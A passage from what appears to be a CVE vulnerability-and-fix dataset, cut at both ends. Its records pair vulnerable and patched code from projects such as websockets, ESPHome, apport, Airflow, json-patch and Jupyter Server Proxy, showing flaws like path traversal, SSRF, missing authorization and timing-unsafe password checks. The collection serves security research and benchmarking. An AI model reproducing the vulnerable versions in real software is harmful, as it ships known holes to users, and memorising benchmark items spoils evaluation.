BasicAuthWebSocketServerProtocol],\n BasicAuthWebSocketServerProtocol,\n )\n\n return functools.partial(\n create_protocol,\n realm=realm,\n check_credentials=check_credentials,\n )"}], "vul_patch": "--- a/src/websockets/legacy/auth.py\n+++ b/src/websockets/legacy/auth.py\n@@ -47,23 +47,22 @@\n \n if credentials is not None:\n if is_credentials(credentials):\n-\n- async def check_credentials(username: str, password: str) -> bool:\n- return (username, password) == credentials\n-\n+ credentials_list = [cast(Credentials, credentials)]\n elif isinstance(credentials, Iterable):\n credentials_list = list(credentials)\n- if all(is_credentials(item) for item in credentials_list):\n- credentials_dict = dict(credentials_list)\n-\n- async def check_credentials(username: str, password: str) -> bool:\n- return credentials_dict.get(username) == password\n-\n- else:\n+ if not all(is_credentials(item) for item in credentials_list):\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n-\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n+\n+ credentials_dict = dict(credentials_list)\n+\n+ async def check_credentials(username: str, password: str) -> bool:\n+ try:\n+ expected_password = credentials_dict[username]\n+ except KeyError:\n+ return False\n+ return hmac.compare_digest(expected_password, password)\n \n if create_protocol is None:\n # Not sure why mypy cannot figure this out.\n@@ -73,5 +72,7 @@\n )\n \n return functools.partial(\n- create_protocol, realm=realm, check_credentials=check_credentials\n+ create_protocol,\n+ realm=realm,\n+ check_credentials=check_credentials,\n )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-27081", "cve_description": "ESPHome is a system to control your ESP8266/ESP32. A security misconfiguration in the edit configuration file API in the dashboard component of ESPHome version 2023.12.9 (command line installation) allows authenticated remote attackers to read and write arbitrary files under the configuration directory rendering remote code execution possible. This vulnerability is patched in 2024.2.1.\n", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/esphome/esphome", "patch_url": ["https://github.com/esphome/esphome/commit/d814ed1d4adc71fde47c4df41215bee449884513"], "programing_language": "Python", "vul_func": [{"id": "vul_py_152_1", "commit": "84c6e52", "file_path": "esphome/dashboard/web_server.py", "start_line": 807, "end_line": 815, "snippet": " async def get(self, configuration: str | None = None) -> None:\n \"\"\"Get the content of a file.\"\"\"\n loop = asyncio.get_running_loop()\n filename = settings.rel_path(configuration)\n content = await loop.run_in_executor(\n None, self._read_file, filename, configuration\n )\n if content is not None:\n self.write(content)"}, {"id": "vul_py_152_2", "commit": "84c6e52", "file_path": "esphome/dashboard/web_server.py", "start_line": 834, "end_line": 843, "snippet": " async def post(self, configuration: str | None = None) -> None:\n \"\"\"Write the content of a file.\"\"\"\n loop = asyncio.get_running_loop()\n config_file = settings.rel_path(configuration)\n await loop.run_in_executor(\n None, self._write_file, config_file, self.request.body\n )\n # Ensure the StorageJSON is updated as well\n DASHBOARD.entries.async_schedule_storage_json_update(filename)\n self.set_status(200)"}], "fix_func": [{"id": "fix_py_152_1", "commit": "d814ed1", "file_path": "esphome/dashboard/web_server.py", "start_line": 807, "end_line": 823, "snippet": " async def get(self, configuration: str | None = None) -> None:\n \"\"\"Get the content of a file.\"\"\"\n if not configuration.endswith((\".yaml\", \".yml\")):\n self.send_error(404)\n return\n\n filename = settings.rel_path(configuration)\n if Path(filename).resolve().parent != settings.absolute_config_dir:\n self.send_error(404)\n return\n\n loop = asyncio.get_running_loop()\n content = await loop.run_in_executor(\n None, self._read_file, filename, configuration\n )\n if content is not None:\n self.write(content)"}, {"id": "fix_py_152_2", "commit": "d814ed1", "file_path": "esphome/dashboard/web_server.py", "start_line": 842, "end_line": 857, "snippet": " async def post(self, configuration: str | None = None) -> None:\n \"\"\"Write the content of a file.\"\"\"\n if not configuration.endswith((\".yaml\", \".yml\")):\n self.send_error(404)\n return\n\n filename = settings.rel_path(configuration)\n if Path(filename).resolve().parent != settings.absolute_config_dir:\n self.send_error(404)\n return\n\n loop = asyncio.get_running_loop()\n await loop.run_in_executor(None, self._write_file, filename, self.request.body)\n # Ensure the StorageJSON is updated as well\n DASHBOARD.entries.async_schedule_storage_json_update(filename)\n self.set_status(200)"}], "vul_patch": "--- a/esphome/dashboard/web_server.py\n+++ b/esphome/dashboard/web_server.py\n@@ -1,7 +1,15 @@\n async def get(self, configuration: str | None = None) -> None:\n \"\"\"Get the content of a file.\"\"\"\n+ if not configuration.endswith((\".yaml\", \".yml\")):\n+ self.send_error(404)\n+ return\n+\n+ filename = settings.rel_path(configuration)\n+ if Path(filename).resolve().parent != settings.absolute_config_dir:\n+ self.send_error(404)\n+ return\n+\n loop = asyncio.get_running_loop()\n- filename = settings.rel_path(configuration)\n content = await loop.run_in_executor(\n None, self._read_file, filename, configuration\n )\n\n--- a/esphome/dashboard/web_server.py\n+++ b/esphome/dashboard/web_server.py\n@@ -1,10 +1,16 @@\n async def post(self, configuration: str | None = None) -> None:\n \"\"\"Write the content of a file.\"\"\"\n+ if not configuration.endswith((\".yaml\", \".yml\")):\n+ self.send_error(404)\n+ return\n+\n+ filename = settings.rel_path(configuration)\n+ if Path(filename).resolve().parent != settings.absolute_config_dir:\n+ self.send_error(404)\n+ return\n+\n loop = asyncio.get_running_loop()\n- config_file = settings.rel_path(configuration)\n- await loop.run_in_executor(\n- None, self._write_file, config_file, self.request.body\n- )\n+ await loop.run_in_executor(None, self._write_file, filename, self.request.body)\n # Ensure the StorageJSON is updated as well\n DASHBOARD.entries.async_schedule_storage_json_update(filename)\n self.set_status(200)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-1326", "cve_description": "A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/canonical/apport", "patch_url": ["https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_227_1", "commit": "ee3e896", "file_path": "apport/ui.py", "start_line": 122, "end_line": 152, "snippet": "def run_as_real_user(args: list[str]) -> None:\n \"\"\"Call subprocess.run as real user if called via sudo/pkexec.\n\n If we are called through pkexec/sudo, determine the real user ID and\n run the command with it to get the user's web browser settings.\n \"\"\"\n uid = _get_env_int(\"SUDO_UID\", _get_env_int(\"PKEXEC_UID\"))\n if uid is None or not get_process_user_and_group().is_root():\n subprocess.run(args, check=False)\n return\n\n pwuid = pwd.getpwuid(uid)\n\n gid = _get_env_int(\"SUDO_GID\")\n if gid is None:\n gid = pwuid.pw_gid\n\n env = {\n k: v\n for k, v in os.environ.items()\n if not k.startswith(\"SUDO_\") and k != \"PKEXEC_UID\"\n } | _get_users_environ(uid)\n env[\"HOME\"] = pwuid.pw_dir\n subprocess.run(\n args,\n check=False,\n env=env,\n user=uid,\n group=gid,\n extra_groups=os.getgrouplist(pwuid.pw_name, gid),\n )"}, {"id": "vul_py_227_2", "commit": "ee3e896", "file_path": "bin/apport-cli", "start_line": 184, "end_line": 200, "snippet": " def ui_update_view(self, stdout=None):\n self.in_update_view = True\n report = self._get_details()\n try:\n subprocess.run(\n [\"/usr/bin/sensible-pager\"],\n check=False,\n input=report.encode(\"UTF-8\"),\n stdout=stdout,\n )\n except OSError as error:\n # ignore broken pipe (premature quit)\n if error.errno == errno.EPIPE:\n pass\n else:\n raise\n self.in_update_view = False"}], "fix_func": [{"id": "fix_py_227_1", "commit": "e5f78cc", "file_path": "apport/ui.py", "start_line": 122, "end_line": 159, "snippet": "def run_as_real_user(\n args: list[str], *, get_user_env: bool = False, **kwargs\n) -> None:\n \"\"\"Call subprocess.run as real user if called via sudo/pkexec.\n\n If we are called through pkexec/sudo, determine the real user ID and\n run the command with it to get the user's web browser settings.\n If get_user_env is set to True, the D-BUS address and XDG_DATA_DIRS\n is grabbed from a running gvfsd and added to the process environment.\n \"\"\"\n uid = _get_env_int(\"SUDO_UID\", _get_env_int(\"PKEXEC_UID\"))\n if uid is None or not get_process_user_and_group().is_root():\n subprocess.run(args, check=False, **kwargs)\n return\n\n pwuid = pwd.getpwuid(uid)\n\n gid = _get_env_int(\"SUDO_GID\")\n if gid is None:\n gid = pwuid.pw_gid\n\n env = {\n k: v\n for k, v in os.environ.items()\n if not k.startswith(\"SUDO_\") and k != \"PKEXEC_UID\"\n }\n if get_user_env:\n env |= _get_users_environ(uid)\n env[\"HOME\"] = pwuid.pw_dir\n subprocess.run(\n args,\n check=False,\n env=env,\n user=uid,\n group=gid,\n extra_groups=os.getgrouplist(pwuid.pw_name, gid),\n **kwargs,\n )"}, {"id": "fix_py_227_2", "commit": "e5f78cc", "file_path": "bin/apport-cli", "start_line": 184, "end_line": 199, "snippet": " def ui_update_view(self, stdout=None):\n self.in_update_view = True\n report = self._get_details()\n try:\n apport.ui.run_as_real_user(\n [\"/usr/bin/sensible-pager\"],\n input=report.encode(\"UTF-8\"),\n stdout=stdout,\n )\n except OSError as error:\n # ignore broken pipe (premature quit)\n if error.errno == errno.EPIPE:\n pass\n else:\n raise\n self.in_update_view = False"}], "vul_patch": "--- a/apport/ui.py\n+++ b/apport/ui.py\n@@ -1,12 +1,16 @@\n-def run_as_real_user(args: list[str]) -> None:\n+def run_as_real_user(\n+ args: list[str], *, get_user_env: bool = False, **kwargs\n+) -> None:\n \"\"\"Call subprocess.run as real user if called via sudo/pkexec.\n \n If we are called through pkexec/sudo, determine the real user ID and\n run the command with it to get the user's web browser settings.\n+ If get_user_env is set to True, the D-BUS address and XDG_DATA_DIRS\n+ is grabbed from a running gvfsd and added to the process environment.\n \"\"\"\n uid = _get_env_int(\"SUDO_UID\", _get_env_int(\"PKEXEC_UID\"))\n if uid is None or not get_process_user_and_group().is_root():\n- subprocess.run(args, check=False)\n+ subprocess.run(args, check=False, **kwargs)\n return\n \n pwuid = pwd.getpwuid(uid)\n@@ -19,7 +23,9 @@\n k: v\n for k, v in os.environ.items()\n if not k.startswith(\"SUDO_\") and k != \"PKEXEC_UID\"\n- } | _get_users_environ(uid)\n+ }\n+ if get_user_env:\n+ env |= _get_users_environ(uid)\n env[\"HOME\"] = pwuid.pw_dir\n subprocess.run(\n args,\n@@ -28,4 +34,5 @@\n user=uid,\n group=gid,\n extra_groups=os.getgrouplist(pwuid.pw_name, gid),\n+ **kwargs,\n )\n\n--- a/bin/apport-cli\n+++ b/bin/apport-cli\n@@ -2,9 +2,8 @@\n self.in_update_view = True\n report = self._get_details()\n try:\n- subprocess.run(\n+ apport.ui.run_as_real_user(\n [\"/usr/bin/sensible-pager\"],\n- check=False,\n input=report.encode(\"UTF-8\"),\n stdout=stdout,\n )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-14255", "cve_description": "A Server Side Request Forgery (SSRF) vulnerability in go-camo up to version 1.1.4 allows a remote attacker to perform HTTP requests to internal endpoints.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/cactus/go-camo", "patch_url": ["https://github.com/cactus/go-camo/commit/77c86db145869cc2d1985644b4232356e3a6076e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_102_1", "commit": "b1a0717", "file_path": "pkg/router/router.go", "start_line": 37, "end_line": 62, "snippet": "func (dr *DumbRouter) ServeHTTP(w http.ResponseWriter, r *http.Request) {\n\t// set some default headers\n\tdr.SetHeaders(w)\n\n\tif r.Method != \"HEAD\" && r.Method != \"GET\" {\n\t\thttp.Error(w, \"Method Not Allowed\", 405)\n\t}\n\n\tcomponents := strings.Split(r.URL.Path, \"/\")\n\tif len(components) == 3 {\n\t\tdr.CamoHandler.ServeHTTP(w, r)\n\t\treturn\n\t}\n\n\tif r.URL.Path == \"/healthcheck\" {\n\t\tdr.HealthCheckHandler(w, r)\n\t\treturn\n\t}\n\n\tif dr.StatsHandler != nil && r.URL.Path == \"/status\" {\n\t\tdr.StatsHandler(w, r)\n\t\treturn\n\t}\n\n\thttp.Error(w, \"404 Not Found\", 404)\n}"}], "fix_func": [{"id": "fix_go_102_1", "commit": "77c86db", "file_path": "pkg/router/router.go", "start_line": 37, "end_line": 63, "snippet": "func (dr *DumbRouter) ServeHTTP(w http.ResponseWriter, r *http.Request) {\n\t// set some default headers\n\tdr.SetHeaders(w)\n\n\tif r.Method != \"HEAD\" && r.Method != \"GET\" {\n\t\thttp.Error(w, \"Method Not Allowed\", 405)\n\t\treturn\n\t}\n\n\tcomponents := strings.Split(r.URL.Path, \"/\")\n\tif len(components) == 3 {\n\t\tdr.CamoHandler.ServeHTTP(w, r)\n\t\treturn\n\t}\n\n\tif r.URL.Path == \"/healthcheck\" {\n\t\tdr.HealthCheckHandler(w, r)\n\t\treturn\n\t}\n\n\tif dr.StatsHandler != nil && r.URL.Path == \"/status\" {\n\t\tdr.StatsHandler(w, r)\n\t\treturn\n\t}\n\n\thttp.Error(w, \"404 Not Found\", 404)\n}"}], "vul_patch": "--- a/pkg/router/router.go\n+++ b/pkg/router/router.go\n@@ -4,6 +4,7 @@\n \n \tif r.Method != \"HEAD\" && r.Method != \"GET\" {\n \t\thttp.Error(w, \"Method Not Allowed\", 405)\n+\t\treturn\n \t}\n \n \tcomponents := strings.Split(r.URL.Path, \"/\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-50944", "cve_description": "Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access.\u00a0This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/8d76538d6e105947272b000581c6fabec20146b1"], "programing_language": "Python", "vul_func": [{"id": "vul_py_308_1", "commit": "1180255", "file_path": "airflow/api_connexion/endpoints/dag_source_endpoint.py", "start_line": 32, "end_line": 48, "snippet": "def get_dag_source(*, file_token: str) -> Response:\n \"\"\"Get source code using file token.\"\"\"\n secret_key = current_app.config[\"SECRET_KEY\"]\n auth_s = URLSafeSerializer(secret_key)\n try:\n path = auth_s.loads(file_token)\n dag_source = DagCode.code(path)\n except (BadSignature, FileNotFoundError):\n raise NotFound(\"Dag source not found\")\n\n return_type = request.accept_mimetypes.best_match([\"text/plain\", \"application/json\"])\n if return_type == \"text/plain\":\n return Response(dag_source, headers={\"Content-Type\": return_type})\n if return_type == \"application/json\":\n content = dag_source_schema.dumps({\"content\": dag_source})\n return Response(content, headers={\"Content-Type\": return_type})\n return Response(\"Not Allowed Accept Header\", status=HTTPStatus.NOT_ACCEPTABLE)"}, {"id": "vul_py_308_2", "commit": "1180255", "file_path": "airflow/models/dagcode.py", "start_line": 180, "end_line": 185, "snippet": " def code(cls, fileloc) -> str:\n \"\"\"Return source code for this DagCode object.\n\n :return: source code as string\n \"\"\"\n return cls._get_code_from_db(fileloc)"}], "fix_func": [{"id": "fix_py_308_1", "commit": "8d76538d6e105947272b000581c6fabec20146b1", "file_path": "airflow/api_connexion/endpoints/dag_source_endpoint.py", "start_line": 39, "end_line": 61, "snippet": "@provide_session\ndef get_dag_source(*, file_token: str, session: Session = NEW_SESSION) -> Response:\n \"\"\"Get source code using file token.\"\"\"\n secret_key = current_app.config[\"SECRET_KEY\"]\n auth_s = URLSafeSerializer(secret_key)\n try:\n path = auth_s.loads(file_token)\n dag_ids = session.query(DagModel.dag_id).filter(DagModel.fileloc == path).all()\n readable_dags = get_readable_dags()\n # Check if user has read access to all the DAGs defined in the file\n if any(dag_id[0] not in readable_dags for dag_id in dag_ids):\n raise PermissionDenied()\n dag_source = DagCode.code(path, session=session)\n except (BadSignature, FileNotFoundError):\n raise NotFound(\"Dag source not found\")\n\n return_type = request.accept_mimetypes.best_match([\"text/plain\", \"application/json\"])\n if return_type == \"text/plain\":\n return Response(dag_source, headers={\"Content-Type\": return_type})\n if return_type == \"application/json\":\n content = dag_source_schema.dumps({\"content\": dag_source})\n return Response(content, headers={\"Content-Type\": return_type})\n return Response(\"Not Allowed Accept Header\", status=HTTPStatus.NOT_ACCEPTABLE)"}, {"id": "fix_py_308_2", "commit": "8d76538d6e105947272b000581c6fabec20146b1", "file_path": "airflow/models/dagcode.py", "start_line": 180, "end_line": 186, "snippet": " @provide_session\n def code(cls, fileloc, session: Session = NEW_SESSION) -> str:\n \"\"\"Return source code for this DagCode object.\n\n :return: source code as string\n \"\"\"\n return cls._get_code_from_db(fileloc, session)"}], "vul_patch": "--- a/airflow/api_connexion/endpoints/dag_source_endpoint.py\n+++ b/airflow/api_connexion/endpoints/dag_source_endpoint.py\n@@ -1,10 +1,16 @@\n-def get_dag_source(*, file_token: str) -> Response:\n+@provide_session\n+def get_dag_source(*, file_token: str, session: Session = NEW_SESSION) -> Response:\n \"\"\"Get source code using file token.\"\"\"\n secret_key = current_app.config[\"SECRET_KEY\"]\n auth_s = URLSafeSerializer(secret_key)\n try:\n path = auth_s.loads(file_token)\n- dag_source = DagCode.code(path)\n+ dag_ids = session.query(DagModel.dag_id).filter(DagModel.fileloc == path).all()\n+ readable_dags = get_readable_dags()\n+ # Check if user has read access to all the DAGs defined in the file\n+ if any(dag_id[0] not in readable_dags for dag_id in dag_ids):\n+ raise PermissionDenied()\n+ dag_source = DagCode.code(path, session=session)\n except (BadSignature, FileNotFoundError):\n raise NotFound(\"Dag source not found\")\n \n\n--- a/airflow/models/dagcode.py\n+++ b/airflow/models/dagcode.py\n@@ -1,6 +1,7 @@\n- def code(cls, fileloc) -> str:\n+ @provide_session\n+ def code(cls, fileloc, session: Session = NEW_SESSION) -> str:\n \"\"\"Return source code for this DagCode object.\n \n :return: source code as string\n \"\"\"\n- return cls._get_code_from_db(fileloc)\n+ return cls._get_code_from_db(fileloc, session)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-14632", "cve_description": "An out of bound write can occur when patching an Openshift object using the 'oc patch' functionality in OpenShift Container Platform before 3.7. An attacker can use this flaw to cause a denial of service attack on the Openshift master api service which provides cluster management.", "cwe_info": {"CWE-787": {"name": "Out-of-bounds Write", "description": "The product writes data past the end, or before the beginning, of the intended buffer."}}, "repo": "https://github.com/evanphx/json-patch", "patch_url": ["https://github.com/evanphx/json-patch/commit/4c9aadca8f89e349c999f04e28199e96e81aba03#diff-65c563bba473be9d94ce4d033f74810e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_292_1", "commit": "9f095e0732475147cbb029ffd99634b386d06651", "file_path": "patch.go", "start_line": 377, "end_line": 407, "snippet": "func (d *partialArray) add(key string, val *lazyNode) error {\n\tif key == \"-\" {\n\t\t*d = append(*d, val)\n\t\treturn nil\n\t}\n\n\tidx, err := strconv.Atoi(key)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tary := make([]*lazyNode, len(*d)+1)\n\n\tcur := *d\n\n\tif idx < 0 {\n\t\tidx *= -1\n\n\t\tif idx > len(ary) {\n\t\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n\t\t}\n\t\tidx = len(ary) - idx\n\t}\n\n\tcopy(ary[0:idx], cur[0:idx])\n\tary[idx] = val\n\tcopy(ary[idx+1:], cur[idx:])\n\n\t*d = ary\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_292_1", "commit": "4c9aadca8f89e349c999f04e28199e96e81aba03", "file_path": "patch.go", "start_line": 377, "end_line": 409, "snippet": "func (d *partialArray) add(key string, val *lazyNode) error {\n\tif key == \"-\" {\n\t\t*d = append(*d, val)\n\t\treturn nil\n\t}\n\n\tidx, err := strconv.Atoi(key)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tary := make([]*lazyNode, len(*d)+1)\n\n\tcur := *d\n\n\tif idx < 0 {\n\t\tidx *= -1\n\n\t\tif idx > len(ary) {\n\t\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n\t\t}\n\t\tidx = len(ary) - idx\n\t}\n\tif idx < 0 || idx >= len(ary) || idx > len(cur) {\n\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n\t}\n\tcopy(ary[0:idx], cur[0:idx])\n\tary[idx] = val\n\tcopy(ary[idx+1:], cur[idx:])\n\n\t*d = ary\n\treturn nil\n}"}], "vul_patch": "--- a/patch.go\n+++ b/patch.go\n@@ -21,7 +21,9 @@\n \t\t}\n \t\tidx = len(ary) - idx\n \t}\n-\n+\tif idx < 0 || idx >= len(ary) || idx > len(cur) {\n+\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n+\t}\n \tcopy(ary[0:idx], cur[0:idx])\n \tary[idx] = val\n \tcopy(ary[idx+1:], cur[idx:])\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10767", "cve_description": "An attacker can include file contents from outside the `/adapter/xxx/` directory, where `xxx` is the name of an existent adapter like \"admin\". It is exploited using the administrative web panel with a request for an adapter file. **Note:** The attacker has to be logged in if the authentication is enabled (by default isn't enabled).", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/ioBroker/ioBroker.js-controller", "patch_url": ["https://github.com/ioBroker/ioBroker.js-controller/commit/f6e292c6750a491a5000d0f851b2fede4f9e2fda"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_181_1", "commit": "fbdbfbd", "file_path": "lib/objects/objectsUtils.js", "start_line": 464, "end_line": 485, "snippet": "function sanitizePath(id, name, callback) {\n if (name[0] === '/') name = name.substring(1);\n\n if (!id) {\n if (typeof callback === 'function') {\n callback('Empty ID');\n }\n return;\n }\n\n if (id) {\n id = id.replace(/\\.\\./g, ''); // do not allow to write in parent directories\n }\n\n if (name.indexOf('..') !== -1) {\n name = path.normalize(name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name[0] === '/') name = name.substring(1); // do not allow absolute paths\n\n return {id: id, name: name};\n}"}], "fix_func": [{"id": "fix_js_181_1", "commit": "f6e292c", "file_path": "lib/objects/objectsUtils.js", "start_line": 464, "end_line": 491, "snippet": "function sanitizePath(id, name, callback) {\n if (name[0] === '/') name = name.substring(1);\n\n if (!id) {\n if (typeof callback === 'function') {\n callback('Empty ID');\n }\n return;\n }\n\n if (id) {\n id = id.replace(/[\\]\\[*,;'\"`<>\\\\?\\/]/g, ''); // remove all invalid characters from states plus slashes\n }\n\n if (name.includes('..')) {\n name = path.normalize('/' + name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name.includes('..')) {\n // Also after normalization we still have .. in it - should not happen if normalize worked correctly\n name = name.replace(/\\.\\./g, '');\n name = path.normalize('/' + name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name[0] === '/') name = name.substring(1); // do not allow absolute paths\n\n return {id: id, name: name};\n}"}], "vul_patch": "--- a/lib/objects/objectsUtils.js\n+++ b/lib/objects/objectsUtils.js\n@@ -9,11 +9,17 @@\n }\n \n if (id) {\n- id = id.replace(/\\.\\./g, ''); // do not allow to write in parent directories\n+ id = id.replace(/[\\]\\[*,;'\"`<>\\\\?\\/]/g, ''); // remove all invalid characters from states plus slashes\n }\n \n- if (name.indexOf('..') !== -1) {\n- name = path.normalize(name);\n+ if (name.includes('..')) {\n+ name = path.normalize('/' + name);\n+ name = name.replace(/\\\\/g, '/');\n+ }\n+ if (name.includes('..')) {\n+ // Also after normalization we still have .. in it - should not happen if normalize worked correctly\n+ name = name.replace(/\\.\\./g, '');\n+ name = path.normalize('/' + name);\n name = name.replace(/\\\\/g, '/');\n }\n if (name[0] === '/') name = name.substring(1); // do not allow absolute paths\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23365", "cve_description": "The package github.com/tyktechnologies/tyk-identity-broker before 1.1.1 are vulnerable to Authentication Bypass via the Go XML parser which can cause SAML authentication bypass. This is because the XML parser doesn\u2019t guarantee integrity in the XML round-trip (encoding/decoding XML data).", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/TykTechnologies/tyk-identity-broker", "patch_url": ["https://github.com/TykTechnologies/tyk-identity-broker/commit/243092965b0f93a95a14cb882b5b9a3df61dd5c0"], "programing_language": "Go", "vul_func": [{"id": "vul_go_88_1", "commit": "366a9db", "file_path": "providers/saml.go", "start_line": "31", "end_line": "31", "snippet": "var CertManager = certs.NewCertificateManager(nil, \"\", nil)"}], "fix_func": [{"id": "fix_go_88_1", "commit": "2430929", "file_path": "providers/saml.go", "start_line": "31", "end_line": "31", "snippet": "var CertManager = certs.NewCertificateManager(nil, \"\", nil, false)"}], "vul_patch": "--- a/providers/saml.go\n+++ b/providers/saml.go\n@@ -1 +1 @@\n-var CertManager = certs.NewCertificateManager(nil, \"\", nil)\n+var CertManager = certs.NewCertificateManager(nil, \"\", nil, false)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21697", "cve_description": "Jupyter Server Proxy is a Jupyter notebook server extension to proxy web services. Versions of Jupyter Server Proxy prior to 3.2.1 are vulnerable to Server-Side Request Forgery (SSRF). Any user deploying Jupyter Server or Notebook with jupyter-proxy-server extension enabled is affected. A lack of input validation allows authenticated clients to proxy requests to other hosts, bypassing the `allowed_hosts` check. Because authentication is required, which already grants permissions to make the same requests via kernel or terminal execution, this is considered low to moderate severity. Users may upgrade to version 3.2.1 to receive a patch or, as a workaround, install the patch manually.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/jupyterhub/jupyter-server-proxy", "patch_url": ["https://github.com/jupyterhub/jupyter-server-proxy/commit/fd31930bacd12188c448c886e0783529436b99eb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_186_1", "commit": "8610a3b", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 211, "end_line": 236, "snippet": " def get_client_uri(self, protocol, host, port, proxied_path):\n context_path = self._get_context_path(host, port)\n if self.absolute_url:\n client_path = url_path_join(context_path, proxied_path)\n else:\n client_path = proxied_path\n\n # Quote spaces, \\u00e5\\u00e4\\u00f6 and such, but only enough to send a valid web\n # request onwards. To do this, we mark the RFC 3986 specs' \"reserved\"\n # and \"un-reserved\" characters as safe that won't need quoting. The\n # un-reserved need to be marked safe to ensure the quote function behave\n # the same in py36 as py37.\n #\n # ref: https://tools.ietf.org/html/rfc3986#section-2.2\n client_path = quote(client_path, safe=\":/?#[]@!$&'()*+,;=-._~\")\n\n client_uri = '{protocol}://{host}:{port}{path}'.format(\n protocol=protocol,\n host=host,\n port=port,\n path=client_path\n )\n if self.request.query:\n client_uri += '?' + self.request.query\n\n return client_uri"}, {"id": "vul_py_186_2", "commit": "8610a3b", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 688, "end_line": 738, "snippet": "def setup_handlers(web_app, serverproxy_config):\n host_allowlist = serverproxy_config.host_allowlist\n rewrite_response = serverproxy_config.non_service_rewrite_response\n web_app.add_handlers('.*', [\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/([^/]*):(\\d+)(.*)',\n ),\n RemoteProxyHandler,\n {\n 'absolute_url': False,\n 'host_allowlist': host_allowlist,\n 'rewrite_response': rewrite_response,\n }\n ),\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/absolute/([^/]*):(\\d+)(.*)',\n ),\n RemoteProxyHandler,\n {\n 'absolute_url': True,\n 'host_allowlist': host_allowlist,\n 'rewrite_response': rewrite_response,\n }\n ),\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/(\\d+)(.*)',\n ),\n LocalProxyHandler,\n {\n 'absolute_url': False,\n 'rewrite_response': rewrite_response,\n },\n ),\n (\n url_path_join(\n web_app.settings['base_url'],\n r'/proxy/absolute/(\\d+)(.*)',\n ),\n LocalProxyHandler,\n {\n 'absolute_url': True,\n 'rewrite_response': rewrite_response,\n },\n ),\n ])"}], "fix_func": [{"id": "fix_py_186_1", "commit": "fd31930", "file_path": "jupyter_server_proxy/handlers.py", "start_line": 211, "end_line": 240, "snippet": " def get_client_uri(self, protocol, host, port, proxied_path):\n if self.absolute_url:\n context_path = self._get_context_path(host, port)\n client_path = url_path_join(context_path, proxied_path)\n else:\n client_path = proxied_path\n\n # ensure client_path always starts with '/'\n if not client_path.startswith(\"/\"):\n client_path = \"/\" + client_path\n\n # Quote spaces, \\u00e5\\u00e4\\u00f6 and such, but only enough to send a valid web\n # request onwards. To do this, we mark the RFC 3986 specs' \"reserved\"\n # and 